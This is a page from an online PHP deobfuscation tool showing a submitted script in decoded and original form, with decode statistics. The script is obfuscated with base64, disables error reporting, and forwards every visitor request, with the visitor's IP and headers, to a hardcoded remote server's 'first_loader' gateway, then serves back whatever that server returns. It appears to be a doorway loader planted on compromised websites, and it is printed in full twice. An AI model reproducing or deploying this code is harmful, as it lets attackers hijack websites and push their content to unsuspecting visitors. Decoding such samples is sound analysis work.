Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php date_default_timezone_set(base64_decode('ZXVyb3BlL21vc2Nvdw=='));ini_set(base64_deco..
Decoded Output download
<?php date_default_timezone_set(base64_decode('ZXVyb3BlL21vc2Nvdw=='));ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);ini_set(base64_decode('ZGlzcGxheV9zdGFydHVwX2Vycm9ycw=='),0);error_reporting(0);$n0=base64_decode('MTkzLjIwMS45Ljkz');$t1=base64_decode('NDQz');$c2=base64_decode('Zmlyc3RfbG9hZGVyL2ZpcnN0X2xvYWRlcl9ndy5waHA=');$p3='';$s4='';$g5=$_SERVER[base64_decode('UkVNT1RFX0FERFI=')];if(isset($_SERVER[base64_decode('SFRUUF9YX1JFQUxfSVA=')])){$g5=$_SERVER[base64_decode('SFRUUF9YX1JFQUxfSVA=')];}else if(isset($_SERVER[base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ')])){$g5=$_SERVER[base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ')];}if(isset($_SERVER[base64_decode('UkVRVUVTVF9VUkk=')])){$c6=Array();if(preg_match(base64_decode('L1wvKFteXC9dK1wuW14/Jl0rKS9p'),$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')],$c6)){if(function_exists(base64_decode('b3BjYWNoZV9pbnZhbGlkYXRl'))){opcache_invalidate(base64_decode('Y29uZi5waHA='));}include(base64_decode('Y29uZi5waHA='));$c2="$c2?fname=".$c6[1];if(isset($_SERVER[base64_decode('UVVFUllfU1RSSU5H')])&&strlen($_SERVER[base64_decode('UVVFUllfU1RSSU5H')])>0){if(!isset($_GET[base64_decode('Ymc=')])){$c2.="&bg=$bot_group";}$c2.=base64_decode('Jg==').$_SERVER[base64_decode('UVVFUllfU1RSSU5H')];}else{$c2.="&bg=$bot_group";}}else{printbase64_decode('UkVRVUVTVCBFUlJPUiAxPGJyPlJFUVVFU1RfVVJJPSc=').$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')].base64_decode('Jzxicj4K');exit(0);}}else{printbase64_decode('JF9TRVJWRVJbUkVRVUVTVF9VUkldIG5vdCBmb3VuZCA8YnI+XG4=');exit(0);}$e8="http://$n0:$t1/$c2";$e9=array("Host: $n0",base64_decode('WC1Gb3J3YXJkZWQtRm9yLUNsaWVudDog').$g5,base64_decode('WC1Gb3J3YXJkZWQtRm9yLUdhdGV3YXk6IA==').$_SERVER[base64_decode('SFRUUF9IT1NU')]);if(isset($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')])){array_push($e9,base64_decode('VXNlci1BZ2VudDog').$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}if(isset($_SERVER[base64_decode('SFRUUF9SQU5HRQ==')])){array_push($e9,base64_decode('UmFuZ2U6IA==').$_SERVER[base64_decode('SFRUUF9SQU5HRQ==')]);}if(isset($_SERVER[base64_decode('SFRUUF9JRl9VTk1PRElGSUVEX1NJTkNF')])){array_push($e9,base64_decode('SWYtVW5tb2RpZmllZC1TaW5jZTog').$_SERVER[base64_decode('SFRUUF9JRl9VTk1PRElGSUVEX1NJTkNF')]);}$u10=array();$u11=curl_init();if($_SERVER[base64_decode('UkVRVUVTVF9NRVRIT0Q=')]==base64_decode('SEVBRA==')){curl_setopt($u11,CURLOPT_NOBODY,true);}curl_setopt($u11,CURLOPT_URL,"$e8");curl_setopt($u11,CURLOPT_HTTPHEADER,$e9);curl_setopt($u11,CURLOPT_HEADER,0);curl_setopt($u11,CURLOPT_RETURNTRANSFER,true);curl_setopt($u11,CURLOPT_FAILONERROR,true);curl_setopt($u11,CURLOPT_HEADERFUNCTION,base64_decode('SGFuZGxlSGVhZGVyTGluZQ=='));$l12=curl_exec($u11);if(curl_error($u11)){$x13=curl_error($u11);$k14=curl_getinfo($u11,CURLINFO_HTTP_CODE);if($k14){}curl_close($u11);return;}$k14=curl_getinfo($u11,CURLINFO_HTTP_CODE);foreach($u10 as $a15){header($a15);}if(isset($_SERVER[base64_decode('SFRUUF9QUk9YWV9DT05ORUNUSU9O')])){header(base64_decode('UHJveHktQ29ubmVjdGlvbjog').$_SERVER[base64_decode('SFRUUF9QUk9YWV9DT05ORUNUSU9O')]);}if(isset($_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')])){header(base64_decode('WC1Gb3J3YXJkZWQtRm9yOiA=').$_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')]);}print$l12;function HandleHeaderLine($u11,$e16){global $u10;array_push($u10,$e16);return strlen($e16);}?>
Did this file decode correctly?
Original Code
<?php date_default_timezone_set(base64_decode('ZXVyb3BlL21vc2Nvdw=='));ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);ini_set(base64_decode('ZGlzcGxheV9zdGFydHVwX2Vycm9ycw=='),0);error_reporting(0);$n0=base64_decode('MTkzLjIwMS45Ljkz');$t1=base64_decode('NDQz');$c2=base64_decode('Zmlyc3RfbG9hZGVyL2ZpcnN0X2xvYWRlcl9ndy5waHA=');$p3='';$s4='';$g5=$_SERVER[base64_decode('UkVNT1RFX0FERFI=')];if(isset($_SERVER[base64_decode('SFRUUF9YX1JFQUxfSVA=')])){$g5=$_SERVER[base64_decode('SFRUUF9YX1JFQUxfSVA=')];}else if(isset($_SERVER[base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ')])){$g5=$_SERVER[base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ')];}if(isset($_SERVER[base64_decode('UkVRVUVTVF9VUkk=')])){$c6=Array();if(preg_match(base64_decode('L1wvKFteXC9dK1wuW14/Jl0rKS9p'),$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')],$c6)){if(function_exists(base64_decode('b3BjYWNoZV9pbnZhbGlkYXRl'))){opcache_invalidate(base64_decode('Y29uZi5waHA='));}include(base64_decode('Y29uZi5waHA='));$c2="$c2?fname=".$c6[1];if(isset($_SERVER[base64_decode('UVVFUllfU1RSSU5H')])&&strlen($_SERVER[base64_decode('UVVFUllfU1RSSU5H')])>0){if(!isset($_GET[base64_decode('Ymc=')])){$c2.="&bg=$bot_group";}$c2.=base64_decode('Jg==').$_SERVER[base64_decode('UVVFUllfU1RSSU5H')];}else{$c2.="&bg=$bot_group";}}else{printbase64_decode('UkVRVUVTVCBFUlJPUiAxPGJyPlJFUVVFU1RfVVJJPSc=').$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')].base64_decode('Jzxicj4K');exit(0);}}else{printbase64_decode('JF9TRVJWRVJbUkVRVUVTVF9VUkldIG5vdCBmb3VuZCA8YnI+XG4=');exit(0);}$e8="http://$n0:$t1/$c2";$e9=array("Host: $n0",base64_decode('WC1Gb3J3YXJkZWQtRm9yLUNsaWVudDog').$g5,base64_decode('WC1Gb3J3YXJkZWQtRm9yLUdhdGV3YXk6IA==').$_SERVER[base64_decode('SFRUUF9IT1NU')]);if(isset($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')])){array_push($e9,base64_decode('VXNlci1BZ2VudDog').$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}if(isset($_SERVER[base64_decode('SFRUUF9SQU5HRQ==')])){array_push($e9,base64_decode('UmFuZ2U6IA==').$_SERVER[base64_decode('SFRUUF9SQU5HRQ==')]);}if(isset($_SERVER[base64_decode('SFRUUF9JRl9VTk1PRElGSUVEX1NJTkNF')])){array_push($e9,base64_decode('SWYtVW5tb2RpZmllZC1TaW5jZTog').$_SERVER[base64_decode('SFRUUF9JRl9VTk1PRElGSUVEX1NJTkNF')]);}$u10=array();$u11=curl_init();if($_SERVER[base64_decode('UkVRVUVTVF9NRVRIT0Q=')]==base64_decode('SEVBRA==')){curl_setopt($u11,CURLOPT_NOBODY,true);}curl_setopt($u11,CURLOPT_URL,"$e8");curl_setopt($u11,CURLOPT_HTTPHEADER,$e9);curl_setopt($u11,CURLOPT_HEADER,0);curl_setopt($u11,CURLOPT_RETURNTRANSFER,true);curl_setopt($u11,CURLOPT_FAILONERROR,true);curl_setopt($u11,CURLOPT_HEADERFUNCTION,base64_decode('SGFuZGxlSGVhZGVyTGluZQ=='));$l12=curl_exec($u11);if(curl_error($u11)){$x13=curl_error($u11);$k14=curl_getinfo($u11,CURLINFO_HTTP_CODE);if($k14){}curl_close($u11);return;}$k14=curl_getinfo($u11,CURLINFO_HTTP_CODE);foreach($u10 as $a15){header($a15);}if(isset($_SERVER[base64_decode('SFRUUF9QUk9YWV9DT05ORUNUSU9O')])){header(base64_decode('UHJveHktQ29ubmVjdGlvbjog').$_SERVER[base64_decode('SFRUUF9QUk9YWV9DT05ORUNUSU9O')]);}if(isset($_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')])){header(base64_decode('WC1Gb3J3YXJkZWQtRm9yOiA=').$_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I=')]);}print$l12;function HandleHeaderLine($u11,$e16){global $u10;array_push($u10,$e16);return strlen($e16);}?>
Function Calls
base64_decode | 1 |
date_default_timezone_set | 1 |
Stats
MD5 | 6f483bdc4aa55a9730f341a38990d2ec |
Eval Count | 0 |
Decode Time | 62 ms |